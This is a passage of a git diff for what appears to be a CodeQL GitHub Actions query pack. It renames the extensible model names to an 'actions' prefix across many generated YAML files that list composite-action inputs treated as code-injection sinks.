"code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/github_ruby.model.yml b/ql/lib/ext/generated/composite-actions/github_ruby.model.yml index 1889fcff144..eedeb384422 100644 --- a/ql/lib/ext/generated/composite-actions/github_ruby.model.yml +++ b/ql/lib/ext/generated/composite-actions/github_ruby.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["github/ruby", "*", "input.builddir", "code-injection", "generated"] - ["github/ruby", "*", "input.srcdir", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/gittools_gitversion.model.yml b/ql/lib/ext/generated/composite-actions/gittools_gitversion.model.yml index f8243352f45..fb6fb0267bb 100644 --- a/ql/lib/ext/generated/composite-actions/gittools_gitversion.model.yml +++ b/ql/lib/ext/generated/composite-actions/gittools_gitversion.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["gittools/gitversion", "*", "input.distro", "code-injection", "generated"] - ["gittools/gitversion", "*", "input.targetFramework", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/go-spatial_tegola.model.yml b/ql/lib/ext/generated/composite-actions/go-spatial_tegola.model.yml index bd2015a7096..60df7484e7f 100644 --- a/ql/lib/ext/generated/composite-actions/go-spatial_tegola.model.yml +++ b/ql/lib/ext/generated/composite-actions/go-spatial_tegola.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["go-spatial/tegola", "*", "input.artifact_name", "code-injection", "generated"] - ["go-spatial/tegola", "*", "input.name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/goauthentik_authentik.model.yml b/ql/lib/ext/generated/composite-actions/goauthentik_authentik.model.yml index 501123a82fe..d0af7b61f98 100644 --- a/ql/lib/ext/generated/composite-actions/goauthentik_authentik.model.yml +++ b/ql/lib/ext/generated/composite-actions/goauthentik_authentik.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["goauthentik/authentik", "*", "input.postgresql_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/godotengine_godot.model.yml b/ql/lib/ext/generated/composite-actions/godotengine_godot.model.yml index 1a17e3db2b8..8d08848d24c 100644 --- a/ql/lib/ext/generated/composite-actions/godotengine_godot.model.yml +++ b/ql/lib/ext/generated/composite-actions/godotengine_godot.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["godotengine/godot", "*", "input.bin", "code-injection", "generated"] - ["godotengine/godot", "*", "input.tests", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/google_dagger.model.yml b/ql/lib/ext/generated/composite-actions/google_dagger.model.yml index a125a4bfa8c..f26f672a586 100644 --- a/ql/lib/ext/generated/composite-actions/google_dagger.model.yml +++ b/ql/lib/ext/generated/composite-actions/google_dagger.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["google/dagger", "*", "input.agp", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/googleapis_java-cloud-bom.model.yml b/ql/lib/ext/generated/composite-actions/googleapis_java-cloud-bom.model.yml index e8d0cc64792..5431aad8dca 100644 --- a/ql/lib/ext/generated/composite-actions/googleapis_java-cloud-bom.model.yml +++ b/ql/lib/ext/generated/composite-actions/googleapis_java-cloud-bom.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["googleapis/java-cloud-bom", "*", "input.bom-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/googleapis_sdk-platform-java.model.yml b/ql/lib/ext/generated/composite-actions/googleapis_sdk-platform-java.model.yml index 736c84b68cc..92c23f9f1fb 100644 --- a/ql/lib/ext/generated/composite-actions/googleapis_sdk-platform-java.model.yml +++ b/ql/lib/ext/generated/composite-actions/googleapis_sdk-platform-java.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["googleapis/sdk-platform-java", "*", "input.bom-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/googlecloudplatform_dataflowtemplates.model.yml b/ql/lib/ext/generated/composite-actions/googlecloudplatform_dataflowtemplates.model.yml index 062203945c5..52654194d81 100644 --- a/ql/lib/ext/generated/composite-actions/googlecloudplatform_dataflowtemplates.model.yml +++ b/ql/lib/ext/generated/composite-actions/googlecloudplatform_dataflowtemplates.model.yml @@ -1,11 +1,11 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["googlecloudplatform/magic-modules", "*", "input.repo", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all - extensible: sourceModel + extensible: actionsSourceModel data: - ["googlecloudplatform/magic-modules", "*", "output.changed-files", "filename", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/googlecloudplatform_magic-modules.model.yml b/ql/lib/ext/generated/composite-actions/googlecloudplatform_magic-modules.model.yml index aedeb4e1023..43c274aa033 100644 --- a/ql/lib/ext/generated/composite-actions/googlecloudplatform_magic-modules.model.yml +++ b/ql/lib/ext/generated/composite-actions/googlecloudplatform_magic-modules.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["googlecloudplatform/magic-modules", "*", "input.repo", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/gravitational_teleport.model.yml b/ql/lib/ext/generated/composite-actions/gravitational_teleport.model.yml index 0d8afb086c9..7f8b87fa20e 100644 --- a/ql/lib/ext/generated/composite-actions/gravitational_teleport.model.yml +++ b/ql/lib/ext/generated/composite-actions/gravitational_teleport.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["gravitational/teleport", "*", "input.target", "code-injection", "generated"] - ["gravitational/teleport", "*", "input.attempts", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/grote_transportr.model.yml b/ql/lib/ext/generated/composite-actions/grote_transportr.model.yml index 4756acbf306..31422a708c5 100644 --- a/ql/lib/ext/generated/composite-actions/grote_transportr.model.yml +++ b/ql/lib/ext/generated/composite-actions/grote_transportr.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["grote/transportr", "*", "input.api-level", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/hashicorp_nomad.model.yml b/ql/lib/ext/generated/composite-actions/hashicorp_nomad.model.yml index a0e4acec75a..30ccfdea631 100644 --- a/ql/lib/ext/generated/composite-actions/hashicorp_nomad.model.yml +++ b/ql/lib/ext/generated/composite-actions/hashicorp_nomad.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["hashicorp/nomad", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/hashicorp_terraform.model.yml b/ql/lib/ext/generated/composite-actions/hashicorp_terraform.model.yml index 6acfcf9773f..9bc22ac93ef 100644 --- a/ql/lib/ext/generated/composite-actions/hashicorp_terraform.model.yml +++ b/ql/lib/ext/generated/composite-actions/hashicorp_terraform.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["hashicorp/terraform", "*", "input.target-terraform-branch", "code-injection", "generated"] - ["hashicorp/terraform", "*", "input.target-terraform-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/hashicorp_vault.model.yml b/ql/lib/ext/generated/composite-actions/hashicorp_vault.model.yml index 7e0deeea906..4ec47cb3975 100644 --- a/ql/lib/ext/generated/composite-actions/hashicorp_vault.model.yml +++ b/ql/lib/ext/generated/composite-actions/hashicorp_vault.model.yml @@ -1,13 +1,13 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["hashicorp/vault", "*", "input.destination", "code-injection", "generated"] - ["hashicorp/vault", "*", "input.version", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["hashicorp/vault", "*", "input.vault-version", "output.vault-version", "taint", "manual"] - ["hashicorp/vault", "*", "input.vault-binary-path", "output.vault-binary-path", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/home-assistant_android.model.yml b/ql/lib/ext/generated/composite-actions/home-assistant_android.model.yml index 18678fe9ecd..81d137ce547 100644 --- a/ql/lib/ext/generated/composite-actions/home-assistant_android.model.yml +++ b/ql/lib/ext/generated/composite-actions/home-assistant_android.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["home-assistant/android", "*", "input.lokalise-token", "code-injection", "generated"] - ["home-assistant/android", "*", "input.lokalise-project", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/homebrew_actions.model.yml b/ql/lib/ext/generated/composite-actions/homebrew_actions.model.yml index d9d492f79cd..79675d59c05 100644 --- a/ql/lib/ext/generated/composite-actions/homebrew_actions.model.yml +++ b/ql/lib/ext/generated/composite-actions/homebrew_actions.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["homebrew/actions", "*", "input.casks", "code-injection", "generated"] - ["homebrew/actions", "*", "input.formulae", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/hyperledger_aries-cloudagent-python.model.yml b/ql/lib/ext/generated/composite-actions/hyperledger_aries-cloudagent-python.model.yml index d3046ff1fc4..3310a67347c 100644 --- a/ql/lib/ext/generated/composite-actions/hyperledger_aries-cloudagent-python.model.yml +++ b/ql/lib/ext/generated/composite-actions/hyperledger_aries-cloudagent-python.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["hyperledger/aries-cloudagent-python", "*", "input.TEST_SCOPE", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/hyperledger_fabric-samples.model.yml b/ql/lib/ext/generated/composite-actions/hyperledger_fabric-samples.model.yml index 845fba40a6c..d12963b43db 100644 --- a/ql/lib/ext/generated/composite-actions/hyperledger_fabric-samples.model.yml +++ b/ql/lib/ext/generated/composite-actions/hyperledger_fabric-samples.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["hyperledger/fabric-samples", "*", "input.ca-version", "code-injection", "generated"] - ["hyperledger/fabric-samples", "*", "input.fabric-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/igniterealtime_openfire.model.yml b/ql/lib/ext/generated/composite-actions/igniterealtime_openfire.model.yml index bcf51805710..1c63a9e6d0f 100644 --- a/ql/lib/ext/generated/composite-actions/igniterealtime_openfire.model.yml +++ b/ql/lib/ext/generated/composite-actions/igniterealtime_openfire.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["igniterealtime/openfire", "*", "input.domain", "code-injection", "generated"] - ["igniterealtime/openfire", "*", "input.ip", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/infracost_actions.model.yml b/ql/lib/ext/generated/composite-actions/infracost_actions.model.yml index e1ff1fa3497..e120de812c4 100644 --- a/ql/lib/ext/generated/composite-actions/infracost_actions.model.yml +++ b/ql/lib/ext/generated/composite-actions/infracost_actions.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["infracost/actions", "*", "input.behavior", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/inspektor-gadget_inspektor-gadget.model.yml b/ql/lib/ext/generated/composite-actions/inspektor-gadget_inspektor-gadget.model.yml index 4c5ef712e58..1be37285c9e 100644 --- a/ql/lib/ext/generated/composite-actions/inspektor-gadget_inspektor-gadget.model.yml +++ b/ql/lib/ext/generated/composite-actions/inspektor-gadget_inspektor-gadget.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["inspektor-gadget/inspektor-gadget", "*", "input.runtime", "code-injection", "generated"] - ["inspektor-gadget/inspektor-gadget", "*", "input.registry", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/intel-analytics_ipex-llm.model.yml b/ql/lib/ext/generated/composite-actions/intel-analytics_ipex-llm.model.yml index 31e1f562877..aa6e9b684d0 100644 --- a/ql/lib/ext/generated/composite-actions/intel-analytics_ipex-llm.model.yml +++ b/ql/lib/ext/generated/composite-actions/intel-analytics_ipex-llm.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["intel-analytics/ipex-llm", "*", "input.extra-dependency", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ionic-team_ionic-framework.model.yml b/ql/lib/ext/generated/composite-actions/ionic-team_ionic-framework.model.yml index 298ba1ccbe3..221aa83de0b 100644 --- a/ql/lib/ext/generated/composite-actions/ionic-team_ionic-framework.model.yml +++ b/ql/lib/ext/generated/composite-actions/ionic-team_ionic-framework.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ionic-team/ionic-framework", "*", "input.totalShards", "code-injection", "generated"] - ["ionic-team/ionic-framework", "*", "input.shard", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/ionic-team_ionicons.model.yml b/ql/lib/ext/generated/composite-actions/ionic-team_ionicons.model.yml index 0dc57625890..71007932427 100644 --- a/ql/lib/ext/generated/composite-actions/ionic-team_ionicons.model.yml +++ b/ql/lib/ext/generated/composite-actions/ionic-team_ionicons.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ionic-team/ionicons", "*", "input.paths", "code-injection", "generated"] - ["ionic-team/ionicons", "*", "input.output", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/ionic-team_stencil.model.yml b/ql/lib/ext/generated/composite-actions/ionic-team_stencil.model.yml index c6fc16750f8..bff13b29ecc 100644 --- a/ql/lib/ext/generated/composite-actions/ionic-team_stencil.model.yml +++ b/ql/lib/ext/generated/composite-actions/ionic-team_stencil.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ionic-team/stencil", "*", "input.paths", "code-injection", "generated"] - ["ionic-team/stencil", "*", "input.output", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/ipfs_aegir.model.yml b/ql/lib/ext/generated/composite-actions/ipfs_aegir.model.yml index 0cbbd38d428..1f75dd81c04 100644 --- a/ql/lib/ext/generated/composite-actions/ipfs_aegir.model.yml +++ b/ql/lib/ext/generated/composite-actions/ipfs_aegir.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ipfs/aegir", "*", "input.browser", "code-injection", "generated"] - ["ipfs/aegir", "*", "input.docker-username", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/jetbrains_jetbrainsruntime.model.yml b/ql/lib/ext/generated/composite-actions/jetbrains_jetbrainsruntime.model.yml index acc6cb91c07..15604c34a17 100644 --- a/ql/lib/ext/generated/composite-actions/jetbrains_jetbrainsruntime.model.yml +++ b/ql/lib/ext/generated/composite-actions/jetbrains_jetbrainsruntime.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["jetbrains/jetbrainsruntime", "*", "input.debug-suffix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/jhipster_generator-jhipster.model.yml b/ql/lib/ext/generated/composite-actions/jhipster_generator-jhipster.model.yml index c59e989db04..aef7f4f6242 100644 --- a/ql/lib/ext/generated/composite-actions/jhipster_generator-jhipster.model.yml +++ b/ql/lib/ext/generated/composite-actions/jhipster_generator-jhipster.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["jhipster/generator-jhipster", "*", "input.generator-path", "code-injection", "generated"] - ["jhipster/generator-jhipster", "*", "input.application-packaging", "code-injection", "generated"] @@ -22,6 +22,6 @@ extensions: - ["jhipster/generator-jhipster", "*", "input.extra-args", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["jhipster/generator-jhipster", "*", "input.skip-workflow", "output.skip-workflow", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/jsocol_django-ratelimit.model.yml b/ql/lib/ext/generated/composite-actions/jsocol_django-ratelimit.model.yml index b426dfb250d..f3a26e867ec 100644 --- a/ql/lib/ext/generated/composite-actions/jsocol_django-ratelimit.model.yml +++ b/ql/lib/ext/generated/composite-actions/jsocol_django-ratelimit.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["jsocol/django-ratelimit", "*", "input.django-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/juicedata_juicefs.model.yml b/ql/lib/ext/generated/composite-actions/juicedata_juicefs.model.yml index 4a0c3c2d30f..4feab5714c7 100644 --- a/ql/lib/ext/generated/composite-actions/juicedata_juicefs.model.yml +++ b/ql/lib/ext/generated/composite-actions/juicedata_juicefs.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["juicedata/juicefs", "*", "input.compress", "code-injection", "generated"] - ["juicedata/juicefs", "*", "input.storage", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/jupyter_docker-stacks.model.yml b/ql/lib/ext/generated/composite-actions/jupyter_docker-stacks.model.yml index 74d0ef69f75..3030f81072a 100644 --- a/ql/lib/ext/generated/composite-actions/jupyter_docker-stacks.model.yml +++ b/ql/lib/ext/generated/composite-actions/jupyter_docker-stacks.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["jupyter/docker-stacks", "*", "input.variant", "code-injection", "generated"] - ["jupyter/docker-stacks", "*", "input.image", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/keycloak_keycloak.model.yml b/ql/lib/ext/generated/composite-actions/keycloak_keycloak.model.yml index ac8762d24ea..7f8885d1ec7 100644 --- a/ql/lib/ext/generated/composite-actions/keycloak_keycloak.model.yml +++ b/ql/lib/ext/generated/composite-actions/keycloak_keycloak.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["keycloak/keycloak", "*", "input.job-name", "code-injection", "generated"] - ["keycloak/keycloak", "*", "input.jobs", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/kserve_kserve.model.yml b/ql/lib/ext/generated/composite-actions/kserve_kserve.model.yml index 6df9a160ec5..93e6b1e0312 100644 --- a/ql/lib/ext/generated/composite-actions/kserve_kserve.model.yml +++ b/ql/lib/ext/generated/composite-actions/kserve_kserve.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["kserve/kserve", "*", "input.directory", "code-injection", "generated"] - ["kserve/kserve", "*", "input.deployment-mode", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/kubeflow_katib.model.yml b/ql/lib/ext/generated/composite-actions/kubeflow_katib.model.yml index 0c2793028a0..5284159e9db 100644 --- a/ql/lib/ext/generated/composite-actions/kubeflow_katib.model.yml +++ b/ql/lib/ext/generated/composite-actions/kubeflow_katib.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["kubeflow/katib", "*", "input.experiments", "code-injection", "generated"] - ["kubeflow/katib", "*", "input.database-type", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/kubeflow_training-operator.model.yml b/ql/lib/ext/generated/composite-actions/kubeflow_training-operator.model.yml index f5bdc3d4bcc..ac8b8a5150a 100644 --- a/ql/lib/ext/generated/composite-actions/kubeflow_training-operator.model.yml +++ b/ql/lib/ext/generated/composite-actions/kubeflow_training-operator.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["kubeflow/training-operator", "*", "input.context", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/kubernetes-sigs_karpenter.model.yml b/ql/lib/ext/generated/composite-actions/kubernetes-sigs_karpenter.model.yml index 161022b8cbe..19e9448994e 100644 --- a/ql/lib/ext/generated/composite-actions/kubernetes-sigs_karpenter.model.yml +++ b/ql/lib/ext/generated/composite-actions/kubernetes-sigs_karpenter.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["kubernetes-sigs/karpenter", "*", "input.k8sVersion", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/kubernetes-sigs_kwok.model.yml b/ql/lib/ext/generated/composite-actions/kubernetes-sigs_kwok.model.yml index 391b1917029..82c5713f943 100644 --- a/ql/lib/ext/generated/composite-actions/kubernetes-sigs_kwok.model.yml +++ b/ql/lib/ext/generated/composite-actions/kubernetes-sigs_kwok.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["kubernetes-sigs/kwok", "*", "input.command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/kubescape_kubescape.model.yml b/ql/lib/ext/generated/composite-actions/kubescape_kubescape.model.yml index 3a45707d59e..2d4108331b9 100644 --- a/ql/lib/ext/generated/composite-actions/kubescape_kubescape.model.yml +++ b/ql/lib/ext/generated/composite-actions/kubescape_kubescape.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["kubescape/kubescape", "*", "input.ORIGINAL_TAG", "code-injection", "generated"] - ["kubescape/kubescape", "*", "input.SUB_STRING", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/kubeshop_botkube.model.yml b/ql/lib/ext/generated/composite-actions/kubeshop_botkube.model.yml index c2e3608f745..ccd49962fa4 100644 --- a/ql/lib/ext/generated/composite-actions/kubeshop_botkube.model.yml +++ b/ql/lib/ext/generated/composite-actions/kubeshop_botkube.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["kubeshop/botkube", "*", "input.username", "code-injection", "generated"] - ["kubeshop/botkube", "*", "input.access_token", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/kyverno_kyverno.model.yml b/ql/lib/ext/generated/composite-actions/kyverno_kyverno.model.yml index 9b8e9d1e7ed..a7e56c8626d 100644 --- a/ql/lib/ext/generated/composite-actions/kyverno_kyverno.model.yml +++ b/ql/lib/ext/generated/composite-actions/kyverno_kyverno.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["kyverno/kyverno", "*", "input.version", "code-injection", "generated"] - ["kyverno/kyverno", "*", "input.sbom-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/lancedb_lance.model.yml b/ql/lib/ext/generated/composite-actions/lancedb_lance.model.yml index 954f2c34661..4c0df425e45 100644 --- a/ql/lib/ext/generated/composite-actions/lancedb_lance.model.yml +++ b/ql/lib/ext/generated/composite-actions/lancedb_lance.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["lancedb/lance", "*", "input.repo", "code-injection", "generated"] - ["lancedb/lance", "*", "input.vcpkg_token", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/launchdarkly_ios-client-sdk.model.yml b/ql/lib/ext/generated/composite-actions/launchdarkly_ios-client-sdk.model.yml index 31cb8acad9e..a69f2303dbe 100644 --- a/ql/lib/ext/generated/composite-actions/launchdarkly_ios-client-sdk.model.yml +++ b/ql/lib/ext/generated/composite-actions/launchdarkly_ios-client-sdk.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["launchdarkly/ios-client-sdk", "*", "input.ios-sim", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/layer5labs_meshmap-snapshot.model.yml b/ql/lib/ext/generated/composite-actions/layer5labs_meshmap-snapshot.model.yml index 4c8df154d8e..c2c87969e93 100644 --- a/ql/lib/ext/generated/composite-actions/layer5labs_meshmap-snapshot.model.yml +++ b/ql/lib/ext/generated/composite-actions/layer5labs_meshmap-snapshot.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["layer5labs/meshmap-snapshot", "*", "input.assetLocation", "code-injection", "generated"] - ["layer5labs/meshmap-snapshot", "*", "input.mesheryToken", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/ldc-developers_ldc.model.yml b/ql/lib/ext/generated/composite-actions/ldc-developers_ldc.model.yml index 8366d5119ae..c1c3bf433cd 100644 --- a/ql/lib/ext/generated/composite-actions/ldc-developers_ldc.model.yml +++ b/ql/lib/ext/generated/composite-actions/ldc-developers_ldc.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ldc-developers/ldc", "*", "input.cmake_flags", "code-injection", "generated"] - ["ldc-developers/ldc", "*", "input.build_targets", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/ledgerhq_ledger-live.model.yml b/ql/lib/ext/generated/composite-actions/ledgerhq_ledger-live.model.yml index a5d99cfc5e0..af21dca8205 100644 --- a/ql/lib/ext/generated/composite-actions/ledgerhq_ledger-live.model.yml +++ b/ql/lib/ext/generated/composite-actions/ledgerhq_ledger-live.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ledgerhq/ledger-live", "*", "input.os", "code-injection", "generated"] - ["ledgerhq/ledger-live", "*", "input.turborepo-server-port", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/lerna_lerna.model.yml b/ql/lib/ext/generated/composite-actions/lerna_lerna.model.yml index e07d26e6a5f..18fdeffe1ec 100644 --- a/ql/lib/ext/generated/composite-actions/lerna_lerna.model.yml +++ b/ql/lib/ext/generated/composite-actions/lerna_lerna.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["lerna/lerna", "*", "input.install-command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/lf-edge_eve.model.yml b/ql/lib/ext/generated/composite-actions/lf-edge_eve.model.yml index 3fe7b27d9d5..ee67e882174 100644 --- a/ql/lib/ext/generated/composite-actions/lf-edge_eve.model.yml +++ b/ql/lib/ext/generated/composite-actions/lf-edge_eve.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["lf-edge/eve", "*", "input.command", "code-injection", "generated"] - ["lf-edge/eve", "*", "input.dockerhub-account", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/libgit2_libgit2.model.yml b/ql/lib/ext/generated/composite-actions/libgit2_libgit2.model.yml index 664c28bfc55..49caeb5f1dc 100644 --- a/ql/lib/ext/generated/composite-actions/libgit2_libgit2.model.yml +++ b/ql/lib/ext/generated/composite-actions/libgit2_libgit2.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - 